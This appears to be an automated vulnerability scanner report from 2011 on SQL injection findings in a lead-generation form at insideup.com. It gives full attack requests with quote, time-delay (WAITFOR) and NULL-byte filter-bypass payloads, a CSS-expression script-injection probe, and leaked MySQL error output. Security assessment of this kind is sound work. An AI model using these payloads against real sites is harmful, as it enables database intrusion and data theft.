select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[default] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[default] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=unea0bhog186iiucdmkgu2c2v1; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The OAVARS[javascript:netsparker(0x001194)] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[javascript:netsparker(0x001194)] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o8il32emft2m4m33ee56m0urs0; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow''/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:24:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/caad00/project.php was not found on this server.</p>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:56:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=71p64m0b5oqkc1r4vv0vsov887; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:56:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qs9e5rv5h5dcpvp8q40klf6qh5; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00'/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow/caad00''/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:24:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00''/project.php was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php'?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php''?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:24:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project.php'' was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:56:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=5chdb3fjimm90dn00014q15u32; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=' at line 5
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sajdqus3sf0s2e11aooonsgui4; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=kpqt8085v47cjp99ebnpcr5us7; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i91fiaen9quafktdbki2u4jkv6; path=/ Content-Length: 6619 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ufnckb7bp9qpbv7ckhi8s1tnd3; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=20ns8qefsrcr3meheatc0b1784; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=vgq61pjv6ju2dj0c561lc9n465; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00'&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:59:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6798 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1969__Business expansion&attributeId_400=1976__Yes&attributeId_401=1980__$5,0' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00''&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:59:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_398 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_398 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:52:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=hc14ckqlvdu5533nm5k7pqeh57; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
